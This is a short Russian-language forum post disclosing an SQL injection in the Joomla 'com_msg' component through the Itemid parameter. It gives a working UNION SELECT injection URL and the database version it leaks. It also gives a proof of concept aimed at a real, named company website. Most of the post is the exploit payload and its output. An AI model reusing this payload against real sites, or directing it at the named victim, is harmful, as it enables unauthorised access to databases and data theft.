16.01.2012, 09:15
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Joomla "com_msg" component SQL Injection
Уязвим параметр Itemid, что позволяет провести SQL-injection. Не путать этот модуль с модулем обратной связи.
Эксплyатация:
Код:
http://site.ltd/index.php?option=com_msg&view=inhalte&Itemid=-15+union+select+version()--+g
Открываем исходный код страницы, видим:
Код:
wechsel("5.1.49-3~bpo50+1-log");
PoC:
Код:
http://www.msg-wintergaerten.de/index.php?option=com_msg&view=inhalte&Itemid=-15+union+select+version()--+g
© Ereee
|
|
|